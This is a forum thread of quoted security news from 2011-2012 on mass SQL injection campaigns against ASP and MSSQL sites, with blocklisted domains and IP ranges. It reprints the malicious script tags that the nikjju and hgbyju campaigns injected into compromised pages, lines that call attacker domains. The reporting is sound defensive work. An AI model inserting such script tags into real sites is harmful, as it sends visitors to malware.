SQL injection attacks...

[AplusWebMaster]

FYI...

Urgent Block: lilupophilupop-dot-com (SQL Injection)
- http://www.malwaredomains.com/wordpress/?p=2213
December 2nd, 2011 - "(The ISC*) is reporting that there’s a SQLi campaign going on right now with the malicious domain lilupophilupop .com being injected into sites running MSSQL. We will block that domain on the next update but you shouldn’t wait…"
* https://isc.sans.edu/diary.html?storyid=12127
Last Updated: 2011-12-02 11:24:01 UTC - "... discovered yesterday about 80 sites showed in Google... and a few minutes ago 4000+. Targets include ASP sites and Coldfusion... The attack seems to work on all versions of MSSQL..."
___

Diagnostic page for AS:48691 (SPECIALIST)
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2011-12-10, and the last time suspicious content was found was on 2011-12-10... Over the past 90 days, we found 15 site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com... that appeared to function as intermediaries for the infection of 189 other site(s)... We found 30 site(s), including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com, that infected 1504 other site(s)..."

- http://blog.dynamoo.com/2010/10/evil...pecialist.html
11 October 2010 - "...blocking 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is probably a good idea..."
inetnum: 194.28.112.0 - 194.28.115.255
netname: Specialist-ISP-PI2
descr: Specialist, Ltd.
Country: MD (Moldova)

- https://blogs.msdn.com/themes/blogs/...006&GroupKeys=
"... malware that connects using an IP address instead of a domain name will -not- be blocked when you use just domain name lists..."

[AplusWebMaster]

FYI... Significant SQLi inroads/growth continue... status update:

RE: https://isc.sans.edu/diary.html?storyid=12127
UPDATE 8/12/2011 - "... number of sites infected is about 160,000 sites..."

Updated 2011-12-29: Diagnostic page for AS:48691 (SPECIALIST)
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2011-12-29, and the last time suspicious content was found was on 2011-12-29... Over the past 90 days, we found 124 site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com... that appeared to function as intermediaries for the infection of 507 other site(s)... We found 300 site(s), including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com... that infected 5064 other site(s)..."
___

- http://blog.dynamoo.com/2011/12/evil...alist-ltd.html
12 December 2011 - "... the number of malicious sites has dropped, but there is still not a legitimate site in sight... you should -block- access to 194.28.112.0/22 (194.28.112.0 - 194.28.115.255) if you can, because this range of IP addresses is nothing but trouble..."

- https://blogs.msdn.com/themes/blogs/...006&GroupKeys=
"... malware that connects using an IP address instead of a domain name will -not- be blocked when you use just domain name lists..."

i.e.: https://zeustracker.abuse.ch/blocklist.php
"... some ZeuS hosts are just hosted on an ip address and not on a domain..."

[AplusWebMaster]

FYI...

- http://blog.imperva.com/2012/01/sql-injection.html
January 05, 2012
___

Lilupophilupop tops 1 million infected pages
- https://isc.sans.edu/diary.html?storyid=12304
Last Updated: 2011-12-31 07:33:00 UTC - "... SQL injection attacks... about 1,070,000 in fact... to give you a rough idea of where the pages are:
UK - 56,300, NL - 123,000, DE - 49,700, FR - 68,100, DK - 31,000, CN - 505, CA - 16,600, COM - 30,500, RU - 32,000, JP - 23,200, ORG - 2,690..."

Updated: 2012-01-05: Diagnostic page for AS48691 (SPECIALIST)
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2012-01-05, and the last time suspicious content was found was on 2012-01-05... Over the past 90 days, we found 148 site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com... that appeared to function as intermediaries for the infection of 591 other site(s)... We found 452 site(s), including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com... that infected 5522 other site(s)..."

- http://blog.dynamoo.com/2011/12/evil...alist-ltd.html
12 December 2011 - "... No UN members recognise Transnistria*, and effectively it sits beyond the reach of international law enforcement... you should -block- access to 194.28.112.0/22 (194.28.112.0 - 194.28.115.255)..."

* https://en.wikipedia.org/wiki/Transn...onal_relations
___

- http://www.malwaredomains.com/wordpress/?p=2338
January 3rd, 2012

- http://centralops.net/co/DomainDossier.aspx
... Information related to '194.28.112.0 - 194.28.115.255'...
netname: Specialist-ISP-PI2
descr: Specialist, Ltd.
country: MD ...
route: 194.28.112.0/22
origin: AS48691 ...

[AplusWebMaster]

FYI...

Injection code masquerades as Google Analytics
- http://community.websense.com/blogs/...analytics.aspx
7 Feb 2012 - "Websense... has discovered a new wave of injection of malicious code disguising itself as Google Analytics, by adopting similar code snippets and malicious domains... We found other similar domains like google-analytics[dot]su in this attack... it is highly obfuscated, hard to understand, but after all tricks it finally will -redirect- to IP address 37.59.74.145 which hosts Black Hole Exploit..."
(More detail at the websense URL above.)

[AplusWebMaster]

FYI...

Plesk admin software actively exploited...
- http://h-online.com/-1446587
1 March 2012 - "A critical security vulnerability in the Plesk administration program is currently being actively used to compromise affected servers. Plesk is used most often by hosting providers and provides a web front-end for administering rented servers. The vulnerability seems to be an SQL injection problem, which an attacker can exploit to gain full administrative access to a system. Linux and Windows versions of Parallels Plesk Panel 7.6.1 - 10.3.1 are affected. Parallels, the company that publishes the software, has already fixed the vulnerability in the current versions and is even offering micro-updates whose only purpose is to fix the problem. Administrators should check the status of their Plesk version* immediately."
* http://kb.parallels.com/en/9294

Security advisory from Parallels: http://kb.parallels.com/en/113321

[AplusWebMaster]

FYI...

Mass SQL injection campaign (180k+ pages compromised)
- http://blog.sucuri.net/2012/04/nikjj...mpromised.html
April 17, 2012 - "... tracking a new mass SQL injection campaign that started early this month. So far more than 180,000 URLs have been compromised. We will keep posting updates as we get them. Nikjju is a mass SQL injection campaign targeting ASP/ASP.net sites (very similar to lizamoon from last year). When successful, it adds the following javascript to the compromised sites:
<script src= http ://nikjju .com/r.php ></script>
This is used to redirect anyone visiting the infected websites to Fake/Rogue AVs (best-antiviruu .de .lv – mostly targeting Windows users). All the sites we analysed so far are Windows-based servers running ASP/ASP.net compromised via SQL injection... So far Google has identified 188,000 pages infected with that javascript call, but the number is growing really fast. It was less than 130,000 yesterday afternoon... The domain Nikjju .com (31.210.100.242) was registered April 1st and we started to see the first batch of compromised sites a few days after (April 4th)... If your suspect your site has been compromised, you can verify it on Sucuri SiteCheck (free scanner*). You will also need to audit your code to make sure that any user input is sanitized before use...
We are seeing a few small .gov sites compromised as well (mostly from China):
jnd .xmchengdu .gov .cn
study .dyny .gov .cn
cnll .gov .cn
bj .hzjcy .gov .cn
mirpurkhas .gov .pk
tdnyw .gov .cn
gcjs .kaifeng .gov .cn ..."

* http://sitecheck.sucuri.net/scanner/

Urgent Block: nikjju .com and best-antiviruu .de .lv
- http://www.malwaredomains.com/wordpress/?p=2606
April 17th, 2012

Nikjju Mass injection campaign (150k+ sites compromised)
> http://atlas.arbor.net/briefs/
Severity: Elevated Severity
Published: Thursday, April 19, 2012 15:40
Another mass SQL injection campaign is underway, affecting vulnerable ASP and ASP.NET sites.
Analysis: While SQL injection vulnerabilities have been known for years, they continue to cause problems ranging from mass injection attacks used to install malware on vulnerable site vistors to more serious attacks that exfiltrate sensitive data for personal, political or financial means. Attackers can also leverage a SQL injection issue to penetrate deeper into a network and move laterally, compromising targeted resources along the way. Code review and proper web application security assessment can help detect such bugs before criminals use them for malicious ends...

[AplusWebMaster]

FYI...

Nikjju SQL injection update (now hgbyju .com/r.php)
- http://blog.sucuri.net/2012/04/nikjj...-comr-php.html
April 22, 2012 - "We posted a few days ago about a Mass SQL injection campaign* that has been compromising thousands of sites. Our latest numbers show more than 200,000 pages got infected with the nikjju .com malware. However, since the last two days, the attackers switched domain names and are now using hgbyju .com to distribute their malware (also hosted at 31.210.100.242). So the following code is now getting added to the compromised web sites:
<script src = http ://hgbyju .com/r.php <</script> ..."
* http://blog.sucuri.net/2012/04/nikjj...mpromised.html
April 17, 2012
___

- https://isc.sans.edu/diary.html?storyid=13036
Last Updated: 2012-04-24 00:17:18 UTC - "... resulting fake/rogue AV campaigns they subject victims to..."

- http://google.com/safebrowsing/diagn...ite=nikjju.com
"... the last time suspicious content was found on this site was on 2012-04-24. Malicious software includes 19 trojan(s), 3 exploit(s)..."
- http://google.com/safebrowsing/diagn...ite=hgbyju.com
"... the last time suspicious content was found on this site was on 2012-04-23. Malicious software includes 2 trojan(s)..."
- http://google.com/safebrowsing/diagnostic?site=AS:42926
"... over the past 90 days, 404 site(s),... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-04-24, and the last time suspicious content was found was on 2012-04-24..."

[AplusWebMaster]

FYI...

- http://blog.spiderlabs.com/2012/05/m...-analysis.html
01 May 2012
> https://www.owasp.org/index.php/SQL_...on_Cheat_Sheet
___

Automated Attacks - SQL injection and RFI/LFI attacks
- http://blog.imperva.com/2012/04/automated-attacks.html
April 25, 2012 - "... cloud-security provider Incapsula published a study* showing that 31 percent of website traffic was -malicious- traffic... interesting is the speed and effectiveness of the hacks. How was it achieved? Automation. Automated hacks are not new. However, recently, we have noticed increased sophistication... this month’s Imperva’s latest Hacker Intelligence Initiative report** is to give a "state of the union" when it comes to automated attacks. Specifically, we describe the key tools and processes hackers use to automate SQL injection and RFI/LFI attacks. We believe these are the two most deployed attack methods and, as in any industry—automation, is a key indicator that someone wishes to achieve an economy of scale. Further, the automated tools being developed are sophisticated. This means:
• The script kiddies are hitting puberty. In other words, their attacks will be more effective and through.
• The pool of hackers is likely to increase. The ease of use of these tools is a key component of their appeal... hacking tools is a cottage industry trying to appeal to those hoping for a few online thrills.
Our report can be downloaded here**. The report details:
• Commonly used automated SQL injection and RFI/LFI tools.
• How to identify them when they hit your website.
• Some strategies needed to stop them."

* http://www.incapsula.com/the-incapsu...-your-business

** http://www.imperva.com/download.asp?id=360
PDF file - 12 pgs. - "... Summary and Conclusions: With automation, the odds of cyber attack are close to 100%. How can security teams prepare and stop malicious, automated site traffic in order to:
› Block attacks early and efficiently.
› Defend against 0 days.
› To save analysis resources by clustering all attack vectors related to the same attack to a single group. Detecting automation require abilities greater than plain signatures. Moreover, detecting bad automation must also allow non-malicious automation...
Contending with automated attacks requires:
› Rate-based detection mechanism: Automated tools often interact with sites at inhuman speeds. Signatures, however, are usually confined to single event. The ability to detect inhuman interactions is a key step.
› Missing or unique headers: Signatures are good at detecting existing pattern not in detecting missing pieces. Automated tools often lack headers, divulging their ulterior intentions. But malicious automation can be distinguished by its use of unique headers or payloads.
› Identify by using the experience of others (reputation): Automated attacks sources tend to attack many targets."

[AplusWebMaster]

FYI...

Malware Analysis - compromised sites April 2012
- http://blog.sucuri.net/2012/05/april...-analysis.html
May 1, 2012 - "When we see a compromised site distributing malware, it is often done via 4 methods: Iframe, Javascript, Spam or internal redirections. Those are not the only ways, and they can be encoded or hidden differently internally on the sites, but the final output on the compromised sites is generally one of them:
1. Iframe injection: It makes the browser loads content from external (and malicious web sites)...
2. Javascript injection: Used to encode (hide) calls to iframes or additional remote javascript includes...
3. .htaccess (or conditional) redirections: Used to redirect anyone visiting the site from search engines (or specific user agents/ referers) to malware or spam content.
4. Blackhat SEO spam: It is not really malware in the sense of the word (since it won’t infect anyone visiting the site), but it is still harmful for the webmaster and the site’s reputation (imagine a corporate site redirecting to a viagra online store).
- April / 2012 stats
Last month, we scanned a LOT of sites and many of them (107,616 to be more precise) were compromised. This is the breakdown per infection type:
• Iframe injection: 52.6%
• Javascript injection: 26.5%
• Blackhat SEO spam: 10.1%
• .htaccess redirections: 7.3%
• Other: 3% ..."
(More detail at the sucuri URL above.)

[AplusWebMaster]

FYI...

Another SQL-i attack - njukol-dot–com ...
- https://www.f-secure.com/weblog/archives/00002357.html
May 3, 2012 - "... the name is no longer as catchy as Lizamoon, the idea remains the same. This njukol .com is still pretty fresh out of the oven. The domain was registered last April 28*... the registrant of the domain is still the same with all those previous ones."
* https://www.f-secure.com/weblog/archives/registrant.png

- http://www.malwaredomains.com/wordpress/?p=2644
April 29th, 2012 - "... add this to your block or shun list."